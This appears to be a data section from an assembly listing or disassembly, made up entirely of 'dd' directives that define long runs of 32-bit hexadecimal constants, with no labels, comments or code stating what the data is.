dd 217ED25Dh, 0B7AE4924h, 162C7E28h, 77B1BD5Ch, 60AFCAAFh
dd 55AB77E4h, 3AA4A534h, 0BF6D7473h, 30052EA9h, 0C1CB6F3Dh
dd 5A656D4Bh, 4BF5181h, 0D9EB5182h, 2B255FF0h, 0FD6C4591h
dd 5F4F8238h, 3AD59FB9h, 0BA56125Ah, 1436A540h, 0A1CF1ADh
dd 5198B428h, 0DD243BBCh, 6D19E2BFh, 0D764C1D3h, 303DCD62h
dd 0C719D557h, 0E5DEE4Dh, 6A2D3A5Eh, 0A9333B45h, 0FBBF7E2Ah
dd 0CEDD3A15h, 78ED2D55h, 4B0BCAEDh, 4EA32DFCh, 78D85FD3h
dd 3F01E27Eh, 3AB7AB2Ch, 56689FA5h, 28FA9580h, 9967AA65h
dd 0EA9EF482h, 0EF9D5749h, 6EA24DDAh, 0F6996CFFh, 9DD74BD5h
dd 0B79C7560h, 5C2BFCF9h, 0DB846C30h, 3F796EF9h, 0F30143B0h
dd 55C5B7A3h, 0AEF0F852h, 5DF899B9h, 0F0DC9FECh, 0C7B99DC3h
dd 0B787626Dh, 0E721BB5Ah, 794C285Fh, 0B3D4ABDFh, 0D6EA87ABh
dd 0F639A79Bh, 18689623h, 54D222EDh, 659955Dh, 0A814A2F9h
dd 0D230558Ah, 2A1F3457h, 517D76F1h, 44575BA1h, 8FE01CA9h
dd 0E5964D42h, 2586EE52h, 4EAECE82h, 87CB4745h, 0AF3C59D6h
dd 3121F0D3h, 350AC10Bh, 910B5C66h, 0F8DAA4B0h, 0B0F213E0h
dd 0A1123C74h, 1939AC33h, 4D81EB57h, 14696922h, 0D111229Dh
dd 3712BCEEh, 0AB629CABh, 0CCCBF31Bh, 0B6C76119h, 5222388Ch
dd 8DA03AAEh, 81B4971Ah, 445AA57Eh, 0A1367872h, 0A21ABA61h
dd 38951A0Dh, 81E7AA82h, 9DF7BE51h, 7334EE2Fh, 95DF0A5h
dd 99604E37h, 0C43B37C8h, 0C422CA8Eh, 424604FEh, 0A4D6ED48h
dd 5060B986h, 0F9BA977Bh, 60A63A95h, 2AAAAF88h, 5F098687h
dd 0AAFDABB9h, 3EBC7DBBh, 0FFA475A0h, 90BD38D6h, 0AF5C2351h
dd 0E3D968AFh, 0C6F20DA5h, 6017072Fh, 0BFA12ABh, 0C97D0C6Dh
dd 28DA4EDFh, 1EC4B67Ch, 0E1564E6Ah, 7F10CFD2h, 0C0EE889Fh
dd 0F8F1CD0Fh, 7D4BEC2Bh, 0AC39CAFEh, 8D754CDCh, 0B9D47F85h
dd 0C14FB9C4h, 7C15AB3Ch, 0ACEECCEDh, 0EB44AB5Fh, 0C674FDD2h
dd 9BB20623h, 2CADB6DBh, 8CBAFC08h, 3F95AC24h, 0E70730B4h
dd 0CD2D1596h, 73160F51h, 0FEE3EA67h, 5783F01Eh, 8C550BB9h
dd 0C8F1E7EBh, 0F95D48F4h, 7D3B4371h, 5D996D32h, 21F84AE6h
dd 0B26DF247h, 893B3BE3h, 0C9F53FDEh, 622A998Bh, 0A05957E9h
dd 5E539734h, 0BB4A95C4h, 6C29E7CCh, 8106F2AAh, 72BED707h
dd 0E6AA83Ch, 0DFA31CA3h, 597E6F27h, 1F6F1B53h, 0BDD0D428h
dd 0A3E1164Fh, 83BA6919h, 0F2CA7136h, 76305FECh, 75DE8AA8h
dd 5CB707FBh, 11ED8F0Dh, 6CC967AFh, 0EB722B46h, 0C5CDABBCh
dd 0ECDF0D0Bh, 0CCA2218Dh, 95A2D0DEh, 0BAE5DA4Bh, 6AFC5587h
dd 0BB7FF03Dh, 25E8FFBDh, 12EC6FFDh, 0ED5ED5ADh, 0B7BADC73h
dd 0E9DF571Ah, 671EC18Ch, 8F72C157h, 2E38C3CBh, 6AA339D6h
dd 0B502EF4Fh, 0D13A5BA6h, 0B72BF772h, 8D8ECA65h, 4BF28802h
dd 0C8B6C346h, 0A74161F3h, 57418CBFh, 57399487h, 75CA239Fh
dd 0F672DB5Eh, 1E5D306Fh, 0C72292A5h, 0A24B3A66h, 0FBEFA0D1h
dd 6F23805Bh, 0F08ECC03h, 4A0BB4ABh, 0A7C328FEh, 0D26A46F3h
dd 89ED5669h, 6AF636EAh, 1311C8EFh, 0E74E8DC7h, 0FA7E5F5Ah
dd 550DE181h, 4481FF36h, 0EAA40DF4h, 6EF7F1EBh, 1BDCB7B0h
dd 0C68A5DB3h, 0CF9B3BA2h, 81B94217h, 4C31379Ch, 4D564969h
dd 5A95508Dh, 0E3C666DFh, 9210A239h, 87B9CE96h, 0E97F36E3h
dd 46A6740Eh, 0BDEF512Bh, 5E982412h, 5F49CD79h, 392AA715h
dd 0D2371A4Eh, 0C1F109A9h, 8E789BF5h, 0BF8740DBh, 42A70A0Ch
dd 0ECF0DCD1h, 0AA2535C8h, 6607EF51h, 4D3B21D5h, 0A6A52F58h
dd 332F7518h, 82C3D49Fh, 5ACA4D0Dh, 0B51C41Dh, 0AA6BFB9Dh
dd 3F1FAA01h, 6383E9C4h, 0AB763CF5h, 0FF95CA77h, 0D15746BCh
dd 0D7BB6CCAh, 946D8D57h, 0DFDA53C5h, 63BB1613h, 0BB032A26h
dd 5DE94ACAh, 0DC125BC3h, 0EB5A5370h, 20994F88h, 0B7ED746Bh
dd 0A4D7246Ah, 2FC077A7h, 0A7BBAD4Fh, 90F6F7FBh, 0EB77150Fh
dd 0FBA02FDFh, 295B7289h, 0FCD46CD8h, 56F61B3Ah, 1AC0B190h
dd 1D3990BEh, 7B1FB483h, 4DEA8F9Ch, 38BFC7EDh, 512AEF2Eh
dd 5DAB4E1Fh, 3D2C8889h, 0D8AEECEAh, 3D2F5D57h, 68446E00h
dd 0E92E5750h, 6B4725E5h, 0B381E381h, 5D1338Bh, 48DC2B74h
dd 945187Fh, 62A8DF52h, 0BFB6EA0Dh, 0C786A83Ch, 3F5C6169h
dd 7548810Dh, 0FF49A406h, 6D9D028Ch, 0F3FB2B39h, 0C51C9703h
dd 0AE86DFFCh, 282AC7B4h, 0EC690C36h, 0FD65BE13h, 696F8D85h
dd 2070FF74h, 559CD6B0h, 6B10B545h, 360BF627h, 0BE3AFC78h
dd 0B53BF759h, 0BABE2770h, 384F97F2h, 3B0BA5E5h, 0EF3AB485h
dd 2EE1B1FAh, 0F51FCA7Bh, 658C7AC0h, 0DE95C993h, 0E08C348Ch
dd 0CCB44425h, 38CF707Ch, 2E8C3D17h, 91A0B0D3h, 0C5683C93h
dd 83CA57EEh, 6DBA843Eh, 0ED1BAF04h, 4F035A75h, 0E4F9689Dh
dd 53BEC7E5h, 5597FFA5h, 5DB7D395h, 0B53C2910h, 7CC0D7FAh
dd 0E28FA974h, 0CA9B4349h, 710A2B2h, 144B7A94h, 80A04DC9h
dd 0E45572A6h, 0CD1368B8h, 0B14359E5h, 81F73A55h, 81AABC49h
dd 2C85B3FDh, 0DB1B6B68h, 2FA155C4h, 0A845B1B9h, 37F24B8Bh
dd 0CBD67159h, 20B3A43Eh, 680E6831h, 296CA878h, 54053994h
dd 997BC654h, 0D5DA044Dh, 0E46B1B7Ah, 7F346E5Eh, 3C64F15Ah
dd 7E2E95A4h, 51F89D18h, 16DC6655h, 0A4CDCFDBh, 0CAC353AAh
dd 53EEB815h, 628BBF23h, 6EFCEB34h, 0BD28DDDAh, 0EB6418A0h
dd 4B4D1B9Bh, 0A755F8BAh, 0A3D62806h, 59BD055Dh, 0C5FC07EFh
dd 0A433C925h, 424FF26Dh, 0D013E8D0h, 67EA45A0h, 4A1231F2h
dd 581E1875h, 31E272F1h, 0EFAB9E16h, 0B478A30Ah, 1AF19957h
dd 3E657D18h, 64542CB7h, 4DF68CC1h, 60319D5Eh, 736C7697h
dd 0C8488553h, 0B61BA4Dh, 9DA21CC0h, 0B0A49336h, 0A644B995h
dd 4181B0FDh, 3518266Eh, 8FBAE36Bh, 4B682B2Bh, 0F56AEA56h
dd 35467571h, 4F9EF9EEh, 0C1F26255h, 0D15B1FE3h, 2F8FC41Ch
dd 0F38BCE1Ch, 59A299C0h, 0CCDBD7E6h, 0DCCFF6Eh, 0B121376h
dd 0F1C6DBFh, 6BEB57E4h, 0D0B5FA12h, 2DDD76AEh, 0B0EDC5BDh
dd 0C711AEBCh, 48E0C573h, 60565FF9h, 0AFB3CF5h, 0F6508F85h
dd 0B43C5A7Bh, 0BE6B771Dh, 0F1311DAFh, 94A6745Fh, 417CE041h
dd 0A1015CB9h, 74643C4Ah, 529C230Bh, 5DD85888h, 422DC8A4h
dd 8BC69839h, 6D4D1ECEh, 0D38844F0h, 864BCDEAh, 0FE40F607h
dd 0DA830D72h, 4A05FE19h, 2289E888h, 0BBD48861h, 2FF436E0h
dd 7E0A9756h, 0B285483Fh
dd 4AB7D418h, 95F37313h, 1F8CB290h, 0D3FB703Eh, 0BB3B82E3h
dd 0A7B7F0EAh, 0D5321EA5h, 6DCD9E86h, 0FCBA716Bh, 0E79C1FC0h
dd 1361954Fh, 0EA1AFE3Bh, 0FECA55C2h, 92D85553h, 6D56AB15h
dd 87A7F9A4h, 9891E17Ch, 0D3EC07C5h, 2A87FC17h, 0DE429EBCh
dd 0C4D9B307h, 528ED1BDh, 0A57566AEh, 0DE4F0F6Eh, 0B2FE2FE2h
dd 57F96E56h, 0DA3BA8FEh, 0F7E63E64h, 0D8674842h, 3EF6DBB5h
dd 0D5E06815h, 70A5AA27h, 0FC8E9FBCh, 791A9EF8h, 8E421EB1h
dd 0B14B4128h, 0DBCB9DF4h, 0D4E1E44Ah, 0C9C58750h, 1AF51AADh
dd 5215C172h, 66EAE30Bh, 4824963h, 0E4BD0E9Fh, 185C2F92h
dd 0E9D5EC1Ah, 0DE5BEFD8h, 9E3CA3BFh, 72BE1C9Fh, 9B213F1Bh
dd 0C71B8E1Fh, 8167C1E5h, 0F8A8A44h, 16E5B738h, 0D5896DBCh
dd 22CC7EC5h, 6E2A77B6h, 0EF07D6F4h, 35F09629h, 0B95B8108h
dd 0A23FC4F6h, 0E1953A9Dh, 96D613E5h, 8C42B757h, 8931FDE4h
dd 0B3E9E1ECh, 9474BE67h, 81E2587Dh, 0DE4D1F83h, 0D9267615h
dd 0ADC78EA0h, 0D5236A44h, 87D8DA56h, 0B53E85D6h, 1E65970Ch
dd 49E26018h, 0FFADD782h, 334DDB4Ch, 0E0784647h, 7ED36E8Eh
dd 17781C29h, 0E9032C34h, 84DB15F7h, 52B3E2D4h, 0BBE406C9h
dd 3F7B5546h, 997CAD17h, 0D57E785Ah, 0BEA36601h, 626E1736h
dd 5BBA33E1h, 5DD2A0ACh, 0EB441515h, 0A4BD27F7h, 0CFF8080Ah
dd 21137ED0h, 9A6ED172h, 0C00C701Ch, 5C6CDAAEh, 0A0BDA34Eh
dd 59CB24A2h, 0FE331AAh, 658944AAh, 44D9DFAEh, 448A961Bh
dd 8972B385h, 8EB5C0A5h, 7C3FF8F6h, 89DDBCD1h, 55043D40h
dd 0E9812D36h, 0E1F7D6FAh, 2677F5D5h, 0B4117665h, 3F4FDD50h
dd 0AFF58A6Bh, 5085D223h, 0BF95C475h, 0D46742E0h, 943E7BD6h
dd 532E7976h, 3C112BEAh, 0AFC60F8Eh, 0C1661FCDh, 2160905Fh
dd 0ECE5A8EDh, 0D696192h, 0FEAC20CBh, 5A71459Ah, 679902AEh
dd 10FCDC3Bh, 0FB46766Bh, 575F112Dh, 0D67C5BFBh, 97C1EA3Dh
dd 16686FDCh, 4199C4FFh, 56F645C5h, 5C9968E3h, 52B1C5FFh
dd 768D0795h, 9B224235h, 0A29E36D3h, 8E36C0F1h, 0ACF9CA7Eh
dd 0C2D1289Eh, 4D652BFCh, 545ACB75h, 5110FED5h, 704000A5h
dd 2399ED45h, 12CCD50Dh, 0B3DCEB2Dh, 0FF37BC8Dh, 41573B52h
dd 65E18A8Dh, 24C0E943h, 1D05CB96h, 569DF3B3h, 0DB735F35h
dd 0D84195A7h, 992511F1h, 5B6D1377h, 593E4AB4h, 0DB666AE2h
dd 90BBB667h, 3FBF2E17h, 5FCF471h, 3FD779FFh, 4576B385h
dd 0EB0383D9h, 0DF15C4Eh, 7BB78704h, 0FACC9460h, 5F71DF16h
dd 3ED105BCh, 5897CEC7h, 9B62F75Dh, 0BF842B1Dh, 0E18DB98Ch
dd 0DFAEC0A6h, 0D2CAAC60h, 56EA566Eh, 626046FBh, 5FEF0AAEh
dd 73795C03h, 450B4702h, 7CA968C2h, 33C1F236h, 0FA203A82h
dd 8324BABFh, 0E5FBFBh, 0B2DACF85h, 0BD7E0EF2h, 0E9FC9ABh
dd 8753487Eh, 4841940Fh, 6A9B8D2Fh, 6328C1DAh, 1B7BE847h
dd 914C84BDh, 0C4B34686h, 0AA77F62Eh, 7A64FB1Ah, 85859ACCh
dd 67365FEDh, 7517D9B9h, 94899D5h, 0E59AACBCh, 58067E26h
dd 65F26C03h, 0EE0583F3h, 1E9DFFA2h, 0DA92A574h, 3A9FD995h
dd 2FF5A852h, 73CFC775h, 6BE8BBEEh, 0F0EBDB88h, 80B5C5F8h
dd 6299D473h, 0E568ED8Fh, 38997C46h, 53B562FBh, 0A45B4358h
dd 7114B9E1h, 0B3AC32A1h, 0E527CC54h, 0A77EDA6Bh, 8BF203F3h
dd 0A9A10A61h, 90CCEAD8h, 10AE4699h, 6A11AE33h, 921D98Ch
dd 0EBF043C3h, 48F7C7Fh, 0A854B1BCh, 0A0D4540Bh, 4466C4EAh
dd 0DFDFE249h, 0FB20E957h, 0B25C6D12h, 1B054EF4h, 0AD973575h
dd 0E87E46B4h, 0A425AC9Ah, 8A1022C2h, 3F61CA0h, 5D23CDE6h
dd 9A6CCE93h, 9FEB5FCBh, 0FAA11AFEh, 0E8F9C3DCh, 0EC8B81E0h
dd 2B62C627h, 29524AD0h, 0C84CED1Eh, 0AFD08FB4h, 5D7FC25Ah
dd 2A9C7428h, 8211C2FBh, 0B39AD2E9h, 0C35FFC9Bh, 8B6AAB79h
dd 8496D29Ah, 59A0F50h, 7EB8250Eh, 389CEE5Dh, 0C47022F0h
dd 0ADC243EFh, 0F2D3D9Ah, 0DD4FCEBFh, 67F5C4D9h, 0C43B9378h
dd 0E4696A71h, 97F71449h, 0D0DAD72Ah, 8DEAE6EBh, 944BA168h
dd 1F68396Ah, 83E6F77Bh, 208B2D13h, 0AAAB84ABh, 0AF934662h
dd 7C3BB3E3h, 0BAFAE5F8h, 1C7FF11Eh, 69949460h, 0CBB734ABh
dd 356671C3h, 0EC4A715Bh, 3EB5F0Bh, 3EA2F5Ah, 27B94D13h
dd 2BD9D248h, 21AFC2FFh, 8CB08BACh, 15C725A3h, 65ADA522h
dd 0AEEFC72Dh, 934A957h, 2E55E089h, 6A39F090h, 791A9AB1h
dd 0BFD18D29h, 4C289E56h, 0E69AC2C0h, 0E9AE93ADh, 174E6F33h
dd 895ACB72h, 506695AFh, 4B389BADh, 0F03966E1h, 0FD809247h
dd 9A298EEFh, 4EFD8155h, 0C4725BEEh, 0D6E0756Dh, 381E24D4h
dd 0A3D0DA14h, 0F734FFB8h, 0D6CFEDCBh, 77DE6AA5h, 0D4B01AFh
dd 3DED02B3h, 837D228Bh, 1E7D10E5h, 6EEC1E4h, 81F0662Bh
dd 1C0CB7F7h, 0AF6E593Dh, 8BDA04F8h, 659C9D3Dh, 0EF21215Bh
dd 766A69DAh, 3074D668h, 91032307h, 0B12535E1h, 2976EFAAh
dd 0C71A3D26h, 2D72BBDCh, 0A5AD0E78h, 3457AB2Ch, 0FED658A6h
dd 0E646262Dh, 0A932649Ah, 0B5B03026h, 93EA5B7Dh, 0DF6D463Bh
dd 0D14DEFA9h, 722EBFB2h, 9CD6B0D5h, 7587568Ah, 66713162h
dd 0DB3220F6h, 1FDD156Ah, 1BF24A1Eh, 94E6AE08h, 0FA0D85D1h
dd 0EF20DFE6h, 81A5A8Ah, 0ED1727Fh, 988FB85h, 0F0973303h
dd 43835A7Ch, 2B27DFCEh, 257DC382h, 2A3C8AB5h, 93F83DA7h
dd 0ED37AB65h, 356BB40h, 0AB6BD2B7h, 84E46165h, 2C132BCBh
dd 0F1D62C30h, 0AFD1F8CFh, 15E2D4DAh, 9BADB536h, 0E568841Ah
dd 5455EF4Eh, 0EC328942h, 53B5240Fh, 0DBC41F39h, 0D28CA05Dh
dd 88C2E632h, 0D57BFA10h, 0D47B8846h, 0AB4F191Ah, 0F69863FDh
dd 709432C5h, 20996F55h, 3B38DF38h, 0EE732854h, 17371FB4h
dd 779DD299h, 0D1B32B89h, 0BF467654h, 6FEA5C8Fh, 8C5277F9h
dd 6FB1501Bh, 0B637B282h, 2E465722h, 9CAF9185h, 3FA45FD0h
dd 1F74BC00h, 6E5DEEB8h, 0E7D8D749h, 256B9CD4h, 0A1ADABE7h
dd 0D797AC55h, 520FF3CDh, 0E9246E3Ch, 0F1698990h, 49D76FE8h
dd 0D91F614Ah, 9686569Eh, 7D6CC288h, 64B54699h, 0D28F605h
dd 6C670799h, 8566D08Dh, 0D20FAA22h, 0F3EE8A20h, 7544DFC0h
dd 0A178397Bh, 82C7BF1Fh, 16DFF6D8h, 213A4DB6h, 6AD68CD4h
dd 0A730DDA4h, 0EAAAF9B5h, 82F4ECBFh, 0E07BB238h, 0E7BE304Eh
dd 66DFA733h, 0EF76D61Ah, 4AD1FB09h, 72E039A5h, 0BC8D30E8h
dd 7B48AAE0h, 6744CE64h, 0A6C07E26h, 771C0FFFh, 3D3F0572h
dd 5A70F46h, 55A2FEF0h, 1FFFF141h, 80BDADA0h, 0B597F527h
dd 5F4C2D53h, 57FB8DF6h, 0D4D7D260h, 9C0FC03Ah, 4DBC3CF6h
dd 4648DF3Bh, 2D1A6659h, 0E974A6B4h, 4D8BAA23h, 0CED95DABh
dd 3E6BAB43h, 0ED3C3A4Dh, 6EC8BBF9h, 4FEA15AEh, 0B83EBF7Fh
dd 0B3BD0D9h, 45379E95h, 0D3B29E06h, 0C664C7C6h, 0CA2E4BC5h
dd 5CAA9146h, 808DB332h, 1581037Dh, 5764646Dh, 0EB99C3C1h
dd 0CA98AFD0h, 0A3F1EE51h, 0F08B98FDh, 0E31F63BCh, 2ED241ABh
dd 3AD25DE3h, 0A2419670h, 4A6BAC1Dh, 2961A4CBh, 0BD4B0B20h
dd 0B098C8EDh, 0DA852251h, 2AB71F05h, 9CBAAEE8h, 0E468D633h
dd 0F5EC5DD0h, 31366458h, 0C1E1335Ah, 3528CE7Fh, 0A297A5E3h
dd 0F2B887E1h, 0CB99E1A9h, 0BF73CFBDh, 0EAD124BFh, 8957ACD6h
dd 0B2542BA5h, 0F4A6FBA9h, 4CDC41B7h, 0B51B4371h, 47EEDB21h
dd 55A745FBh, 0EEA8C2ADh, 0EB663522h, 0D7E4E446h, 97793AF8h
dd 0ECC3A0D2h, 0C133F094h
dd 0F895221Bh, 6A92C597h, 5D008EF9h, 0E519B186h, 975E6782h
dd 0EBEBD4C7h, 6E416721h, 335F39CBh, 3614E801h, 0DA6C38ABh
dd 36EA9A38h, 0ADF6855Eh, 0B10BF5B5h, 76EEEA1Dh, 0F68923CCh
dd 0A526D9AAh, 0BC2BDCD7h, 3AB76BF1h, 0FA411557h, 15CF235Ch
dd 0A203225h, 0DF8BE32Bh, 0C055A997h, 7B8D3695h, 0F0BEC065h
dd 0ED8EE262h, 25AABE07h, 4B64C266h, 35C4AE72h, 0CD705B61h
dd 7DD4C1ABh, 0FD6748EFh, 5FB02384h, 7B96BD08h, 72CA5898h
dd 0FAA3B45Fh, 2D1AC4BDh, 0CC429552h, 0E42E0B2Fh, 0BDD39D59h
dd 169F9400h, 7C75ADAFh, 69647585h, 3CC39E85h, 0E18320BAh
dd 7A0379C7h, 6E021C94h, 59CF570Bh, 105F9A8Bh, 0E5AA3EEEh
dd 6738B913h, 8543A182h, 0F3D5D1ACh, 1510957Ch, 38724C05h
dd 6478C74Fh, 23FF29AAh, 0A8AAB872h, 3A58728Ah, 0B5FA4FF4h
dd 2635A9A1h, 0C1C26E0Fh, 24DB2367h, 3A47B8F4h, 0DA6B67CCh
dd 7235B7CBh, 4EE629BAh, 0A6C070FEh, 4B0E61A9h, 8155D73Dh
dd 0BC973CB7h, 1758AF37h, 607307C7h, 7BB65037h, 6566765Fh
dd 0E5ADE7D8h, 786BF383h, 5FD55A77h, 88AD3999h, 7372EB3Dh
dd 77723AE8h, 5B1CA3C8h, 3286A880h, 0C50ED102h, 8902315Fh
dd 927B8B15h, 0E0314A3Ch, 0BB47E87h, 39669058h, 557B553Fh
dd 0FD4DDD14h, 6B69E848h, 0A43AA3CAh, 0F9D925D9h, 6CCEC5D6h
dd 6FF5BEFDh, 62827782h, 83BD54D0h, 8D1931ACh, 684775B9h
dd 0EE163E35h, 8D5ED728h, 0C73B0C4Ah, 62F8C066h, 2F7460F7h
dd 7A1E3B32h, 0D067EC0Ah, 5A3084A6h, 9A7D7990h, 4C244B2Ah
dd 232A7CBDh, 0EDB64FE6h, 0D475AF47h, 0A12AEF19h, 0DD177109h
dd 0F1DDD765h, 14B46DFDh, 446EB54Ch, 0D12A34DBh, 0A60E05B3h
dd 95BF2A0Ch, 0E163A756h, 0A8E88AF6h, 355C2951h, 0E69258E7h
dd 0AAE01E52h, 0BA1D941Eh, 63D7BB2h, 0BC1D47EAh, 0D7C11EC3h
dd 2F236732h, 28340F75h, 382C7FDAh, 0E0A32F39h, 0C88F4141h
dd 562E6AE3h, 8E05F238h, 0F7F0E365h, 0F57CFEF3h, 0B650B59Ch
dd 77CEB4AFh, 0ECE8EFF9h, 5C9F744h, 0E26AA892h, 0B4DD3B60h
dd 0BCB8134Ch, 33DA904Dh, 0F043A823h, 7E8B102Fh, 39228DD1h
dd 0A14EB59Ch, 7494F2C7h, 939428C7h, 0A115F33Bh, 1C24AD93h
dd 21608756h, 17FE7DC3h, 0F49C5D4h, 9B2BD41Fh, 56BA4BE4h
dd 97A4F8A6h, 35B83886h, 0A86ED147h, 0CFF194D9h, 754AEC85h
dd 4F6CAD50h, 1F843A6Dh, 9492146Ah, 2F13E2CDh, 7EFCA58Fh
dd 5267F5E7h, 76B3F17h, 0D2418770h, 415CD562h, 0E6401B42h
dd 8F1D1C36h, 0A0EA08DBh, 43174EA2h, 0C0FDB5DBh, 9D6549ADh
dd 0C6B4B073h, 0C888A07h, 7F835326h, 0ABEC6C15h, 1FC6EE8Bh
dd 8EE72A4Ah, 7C54465Ch, 1D12E138h, 0FF6A92ECh, 131AC2ECh
dd 0DDCADC77h, 4B985E94h, 0F46739B5h, 0E730A004h, 9917E233h
dd 6776C84Ah, 0A21CB479h, 0FAAC4A3Bh, 0BD8C6659h, 0F5F39594h
dd 9F6BAC39h, 12A0D4D1h, 71D0DEBAh, 0E5D5F4EDh, 3D42C0F9h
dd 0AF1A4950h, 0F9F9A92Eh, 265232DEh, 0AC96A998h, 16E2724h
dd 0DC8E20EDh, 0A2FCC419h, 103394FBh, 230B2E47h, 0ED35E9C8h
dd 0C0B1FF67h, 481DA95Fh, 1CBFE2AEh, 0B37256A9h, 9A640F8Eh
dd 97512FF3h, 5BB4E332h, 37508055h, 128E32A3h, 0D729832Ah
dd 2FA3746Bh, 5DC06732h, 450F68F3h, 7C4EA7CBh, 1760D815h
dd 396F4DC1h, 1778764Ch, 5FA0F089h, 12ACC574h, 90DDD55Fh
dd 0BD65AF2Ch, 0CDAFAE6Dh, 0A1C2D673h, 0FF1CA16Dh, 255C3DA5h
dd 65013EFDh, 0CD382D3h, 13B1C1EAh, 501F2CB9h, 0B7792C6h
dd 0B77A1749h, 697C7333h, 0AB2A2F4Bh, 8E3A1F5Bh, 186C691Ah
dd 758EDEAFh, 0BE8C35F7h, 4A5ECF1h, 9B9A224h, 730D2A81h
dd 60CE006Ah, 187E2232h, 0F9E7C2FFh, 7EC71028h, 31973597h
dd 972DC0A3h, 61E143F1h, 0C59003Eh, 2F99DC1Fh, 0FD06AE09h
dd 2CC9F47Eh, 0F9096D1Eh, 6B444CEAh, 0ACB86548h, 69ED7AABh
dd 3853BD1Bh, 733BFEB1h, 0E637F86Fh, 90B9A7ADh, 0FF39ED52h
dd 0A405724Ah, 8ED55694h, 0F7F05D68h, 3D152729h, 0CBA20CBCh
dd 68E302E1h, 477DF9A3h, 85A9B931h, 3CD089D9h, 0C3A6C599h
dd 9A754D33h, 2B4C589Ah, 0B5035D39h, 0B5402CD3h, 0DABE0460h
dd 2A7B8DA2h, 0DA52A5CDh, 0BF56C554h, 0A3015BB4h, 19A889B5h
dd 55488776h, 0D352CABEh, 0F325B607h, 69B1EAEFh, 7E0DF935h
dd 16162D81h, 0B7B2409Eh, 85A9F5A1h, 81E9B673h, 71174161h
dd 6BA5C36Bh, 0FD4C72F3h, 0C46B4AE2h, 132ACBA9h, 25B24C8Bh
dd 5064898Dh, 0D62A25B9h, 0A1687CA9h, 95DADDDAh, 0E05CE1F3h
dd 16679579h, 0F461E3Ch, 0FAE9D70Fh, 0CAEC2E0Fh, 2D5C534Bh
dd 2E473A51h, 8B2317D2h, 57701A77h, 0B6A25772h, 0D68C5CEDh
dd 0E55362CCh, 0BED29975h, 796CC093h, 0BD815A2Dh, 253464C2h
dd 0B90EE373h, 95D937C0h, 0E2FF35CEh, 9D4BBE7Dh, 0B3386D5Fh
dd 0FCDA08CEh, 633EB1CAh, 97DE3A15h, 82F28FD6h, 0E9CEE2B4h
dd 13B9152Ah, 2D1F9CD1h, 4B2CAD15h, 68855ADCh, 8C5D219Fh
dd 0FF87663Bh, 6EE52C95h, 39DA0FC7h, 65C79012h, 179995A2h
dd 0A9499DEBh, 0E174A55Ah, 8A02DF97h, 0F6732D3Ch, 9CD58B9Ah
dd 0C732C1F4h, 0A165662Eh, 77681F83h, 0D4CD99FFh, 8A08714Bh
dd 7BF326CCh, 0BCBD4D2Dh, 619CAE5Fh, 797BFE9Dh, 53BE4DC3h
dd 466BBED1h, 0C92150ABh, 0CC61F2A7h, 0D23972F5h, 0FCDDB496h
dd 784C95Eh, 9289F8B7h, 710CAB98h, 346B4567h, 0F355767Dh
dd 6E069F81h, 18663D1Ch, 0AD2FA7E1h, 5F79F997h, 0BBCA8594h
dd 0ABB61D46h, 46A14162h, 30ABC76h, 0C25B3AA6h, 0B5FFDD24h
dd 57052A32h, 0DAB2BBA7h, 84FE5074h, 85EFEBCAh, 0EBF3FECBh
dd 1A957B96h, 8FE302B4h, 0D068777Fh, 0FC3FC4EFh, 5FC69E12h
dd 0D3685F55h, 9E17C452h, 940DBADEh, 12D1260Eh, 409B98EAh
dd 842633D7h, 209CD40Ch, 4218D669h, 0DF12AAE9h, 30C9EF3Fh
dd 0B986DCEEh, 9205F6ABh, 0C9D65F63h, 9AF72583h, 0D2F08F21h
dd 0CC6F4F57h, 0E7B5D068h, 7B258F33h, 4AAFE12Ah, 0CABB666Bh
dd 0A6F8CA7Eh, 0F22E5949h, 585F3078h, 0D7FE1697h, 6DB7FF7Bh
dd 500E4903h, 0FCE1B1C1h, 940A0A05h, 0F4382682h, 34C50AFDh
dd 97026FFDh, 0EB177729h, 0AE3704A9h, 0BCDE1CE2h, 3FEB91CDh
dd 5717F399h, 0B5B0E4C2h, 7118D9ACh, 1B89EE4Ah, 0E50F0641h
dd 0A0CDFE7Ah, 3CF8C2DDh, 0EA2CB138h, 0BA3F9B81h, 0D6561ECEh
dd 96C07AEBh, 17269825h, 9D68BCB8h, 0E87316AEh, 0F556F858h
dd 0CBB281C4h, 8286301Ch, 0F8C8EB76h, 2C10B45Ch, 5A8246C5h
dd 0ADFEF3BEh, 373AA815h, 0EE826C1h, 16F90F85h, 133EF563h
dd 0D65FD23Eh, 0B459A5D6h, 2AD881BAh, 0DB593D05h, 0BEF53D17h
dd 0EC22BF77h, 0C3EA237Ah, 9981A802h, 0B547F3AFh, 0B6A2F626h
dd 0EB2864BCh, 0D2619FEAh, 3E8ACE76h, 58989075h, 44024674h
dd 0A5022F11h, 0EFBB2A1Bh, 314B391Eh, 61F48DDEh, 28C1DC55h
dd 0C7A68C30h, 82F823ADh, 8ADBEEA2h, 5B7C2F95h, 0CFF7BA01h
dd 2341D5Dh, 276803AEh, 0D67C97E2h, 732C8A5Bh, 23E72781h
dd 3DA2552Eh, 7FA49E64h, 1A579D22h, 3F13F98Eh, 0AAAC4FE4h
dd 0AAC714D7h, 0A6BE3295h, 0C96F0359h, 0A1F0BFCFh, 8C3AFD9Bh
dd 0D9AF7D51h, 0F0709FE4h, 21BFA2F2h, 3660844Fh, 0A71F649Ah
dd 495CD046h, 0D54C9568h, 8370854Bh, 0F12C8DDCh, 5D8DC223h
dd 68E916FFh, 0EFC7C719h, 42C64907h, 0B9892FA8h, 0F713AB47h
dd 0F8B7F5C0h, 0E73ABC0h
dd 0E0F0D529h, 0BB7F17F2h, 6D10E360h, 9F1ED255h, 2F3F3E05h
dd 0B3C6FC12h, 5A900F0Ah, 3B19F774h, 2E9F4AF4h, 8330088h
dd 0FADFE21Fh, 0FE7F5D72h, 9C683AEh, 7E33519Fh, 0DFF91E0Eh
dd 943CD1C7h, 0D54A340Dh, 0B004F2AFh, 0AAE41ABEh, 484FFFE4h
dd 8C6AF3CDh, 0C555C3ACh, 94338DA2h, 0B931B9F6h, 0EACC5235h
dd 51E75B52h, 0AA28C943h, 0FCBC8ECBh, 0F6B873F8h, 0BD346EDDh
dd 46AECAE1h, 0E6E6116Bh, 8C651ACAh, 5A92E559h, 3988FACEh
dd 0FF703F3Eh, 0E8303180h, 89A42DEAh, 0D604A633h, 4637D909h
dd 5E711B99h, 97EACF4h, 0C5B2D07Dh, 0DDFB41DDh, 134638EFh
dd 8E662753h, 2C9354E6h, 9B446556h, 0B5D2EF77h, 0FDA3D4BBh
dd 0CAFA0BDEh, 0C1DF12FFh, 0C4635D7Bh, 41654CC3h, 0F042E935h
